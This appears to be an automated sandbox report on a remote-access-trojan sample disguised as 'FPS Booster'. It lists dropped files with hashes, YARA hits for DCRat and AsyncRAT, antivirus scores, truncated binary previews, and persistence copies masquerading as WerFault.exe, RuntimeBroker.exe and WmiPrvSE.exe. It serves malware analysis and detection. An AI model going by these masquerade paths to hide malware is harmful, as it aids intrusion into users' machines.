                                          Preview:e8Wnq3AEl300YHma6cgviVEBsNxyaTSmCyVWHfbU6qv1wh8hAXakhU2I3V4cGLnSkOxkwQTbALy2kNOLOPxD3rEr6Mcwk8OuDcQitXvuE8jVf9hqGsN0XkZ3KGojyh0C7EyH6qc1dD84IsL6pwp2uXWdDXXmtM5gIhYbLZuZPWXUlfub4r4C27RjrVEiSzHRHcvkUtvPBPmYAC1hm6sBS3oKPyu0VLHZPGMIuKGK6pAmV3iodg5WHF8OxkUf9430IMJ40txczhFn3CzWQGWyPvSJH8UJzlLBvKdJtoyutdgkAVVvv8P2iFkX49x2YnnOVD2siqmlSmEwOsJwnjY1WSdpjGPt15WG0SO7dmNEVnk5AyIL0APzOw2CjMJcb3uWQ866dMTAVTfssipv7D30qg1EZLXQcunc2OpB2MsorOd4QJUBhXfX94ptH
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (945), with no line terminators
                                          Category:dropped
                                          Size (bytes):945
                                          Entropy (8bit):5.9082459955312805
                                          Encrypted:false
                                          SSDEEP:24:/KgW80tTNPHj876p7zuQ/cMfRrMkE4vfmo51zzK:yp3Txfb/ci/1FzK
                                          MD5:A83169300CBDD0B3555FE4FD11D995CB
                                          SHA1:3423D80E77B3D0C0A31E0FE2714C16891A7572D7
                                          SHA-256:2D6B3B84CED8DECA4A60E2845D23AC54C5FED2F7CCB0F9402A57B917B2CEBCC7
                                          SHA-512:4189791E0BA999F782F0AD338C860E7FAD195C92F0D83ECAB46C92E9FC255EF1C91C63DB0A868743265CA53F2AA3B6FC4541D6DF283C27E06C58025E789CA66A
                                          Malicious:false
                                          Preview:
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (599), with no line terminators
                                          Category:dropped
                                          Size (bytes):599
                                          Entropy (8bit):5.8663418053295455
                                          Encrypted:false
                                          SSDEEP:12:UEVUMZcmYSXVrNqJyNIk/kmB5fMrs5SHIFm7yBIR9y3ygSzVfp3/LTwKf:fDZSSX5NDpB5fMjHIFPBTafDf
                                          MD5:206FBBB5412B69EEB5A6B5737B6681DB
                                          SHA1:5EA4D3E029221FEE41D9064BC86E59726AAB0757
                                          SHA-256:7F7639C0ABFC6EE11BC48427CCC2264AE44D629E30E880770E2F43CF5214402C
                                          SHA-512:A58D211BA31A3D455396D463204B8CAD4A846AB149D464395D40A0DD55C6D27A6B126F0419B644B921650216C583A5764914F6218FD79E547776B5CFA93C3ACD
                                          Malicious:false
                                          Preview:
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\WmiPrvSE.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Default\WmiPrvSE.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\Default\WmiPrvSE.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Default\WmiPrvSE.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (832), with no line terminators
                                          Category:dropped
                                          Size (bytes):832
                                          Entropy (8bit):5.90414159728306
                                          Encrypted:false
                                          SSDEEP:24:puA5/JuFm5CmnvSt/0dZGo858mO8AFSrl16:pNfXzStuZM8NNSL6
                                          MD5:CA9F7BC8FB57A485AF431841F0545A68
                                          SHA1:469EDFC1351B4EC84171F09FD3700A1C959D244F
                                          SHA-256:36DBB8582C0CDF0BDA446D00E59F74BFCE4A339531AA02961F539B4851A9729E
                                          SHA-512:AC0B32D43F7358B3527880A78BAED6E9E68790B91C9E0CC7D01B6DE68969AB96C53AC59EC21718B8B491867FE708921FFC8910B9545003BE19A291618A14835A
                                          Malicious:false
                                          Preview:
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1510
                                          Entropy (8bit):5.380493107040482
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                          MD5:EC75759911B88E93A2B5947380336033
                                          SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                          SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                          SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                          Process:C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1510
                                          Entropy (8bit):5.380493107040482
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                          MD5:EC75759911B88E93A2B5947380336033
                                          SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                          SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                          SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                          Process:C:\Windows\regedit\explorer.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1510
                                          Entropy (8bit):5.380493107040482
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                          MD5:EC75759911B88E93A2B5947380336033
                                          SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                          SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                          SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1969
                                          Entropy (8bit):5.37489905566343
                                          Encrypted:false
                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
                                          MD5:40B0737D9E519BE2FAE92D41EE16B42F
                                          SHA1:57A1EE0799583C2FDFE12AB3721B872A7B669D97
                                          SHA-256:3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
                                          SHA-512:EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                          Process:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):440224
                                          Entropy (8bit):7.575534082136887
                                          Encrypted:false
                                          SSDEEP:6144:K50gUCEhptn640MJU1UUDkGdOcVb5HLw2+bNracddmVfdEDtO6zaZM+wo0fsLsNB:c0g8PQHE1HmVfdMFCjwo00+51f
                                          MD5:74BE806E27A351565F2EC136DCB5232C
                                          SHA1:0EC9FC48C5C290014958C05940BC340EED942E15
                                          SHA-256:33B5E6FF81C482B3B62F8ED847FD25E39724DC6EB6C2A3881B1004DC75C170B6
                                          SHA-512:0ECE93924E569718EB7DCA19474F2CDE1199BAC8EAD206A01A65DCF33E7718FCC7C668D6D891DD164F011AE9FB53272003BBC5DB54EBE6DE62C3B01D4986DD4D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.................................^1....@.................................@........@...W............... ...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...P...............................rsrc....W...@...X..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11264
                                          Entropy (8bit):5.729426875863261
                                          Encrypted:false
                                          SSDEEP:192:0N2gQuUwXzioj4KALV2upWzVd7q1QDXEbBZ8KxHdGzyS/Kx:rJoiO8V2upW7vQjS/
                                          MD5:BF712F32249029466FA86756F5546950
                                          SHA1:75AC4DC4808AC148DDD78F6B89A51AFBD4091C2E
                                          SHA-256:7851CB12FA4131F1FEE5DE390D650EF65CAC561279F1CFE70AD16CC9780210AF
                                          SHA-512:13F69959B28416E0B8811C962A49309DCA3F048A165457051A28A3EB51377DCAF99A15E86D7EEE8F867A9E25ECF8C44DA370AC8F530EEAE7B5252EABA64B96F4
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..............]..............XP......Xd......XU......XS.....Rich............PE..L.....GO...........!................('.......0...............................`............@..........................3.......1..P............................P.......................................................0..\............................text...1........................... ..`.rdata.......0......."..............@..@.data...@....@.......&..............@....reloc..L....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                          File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                          Category:dropped
                                          Size (bytes):26494
                                          Entropy (8bit):1.9568109962493656
                                          Encrypted:false
                                          SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                          MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                          SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                          SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                          SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                          Malicious:false
                                          Preview:BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                          Process:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):9728
                                          Entropy (8bit):5.115973604853638
                                          Encrypted:false
                                          SSDEEP:192:SbEunjqjIcESwFlioU3M0LLF/t8t9pKSfOi:SbESjFCw6oWPFl8jfOi
                                          MD5:4CCC4A742D4423F2F0ED744FD9C81F63
                                          SHA1:704F00A1ACC327FD879CF75FC90D0B8F927C36BC
                                          SHA-256:416133DD86C0DFF6B0FCAF1F46DFE97FDC85B37F90EFFB2D369164A8F7E13AE6
                                          SHA-512:790C5EB1F8B297E45054C855B66DFC18E9F3F1B1870559014DBEFA3B9D5B6D33A993A9E089202E70F51A55D859B74E8605C6F633386FD9189B6F78941BF1BFDB
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q+.v.J.%.J.%.J.%.2.%.J.%.J.%"J.%..5%.J.%...%.J.%...%.J.%...%.J.%Rich.J.%........PE..L.....GO...........!.........................0...............................p............@......................... 7..k....2.......P.......................`.......................................................0...............................text............................... ..`.rdata.......0......................@..@.data...0....@......................@....rsrc........P....... ..............@..@.reloc..N....`......."..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):56
                                          Entropy (8bit):5.110577243331644
                                          Encrypted:false
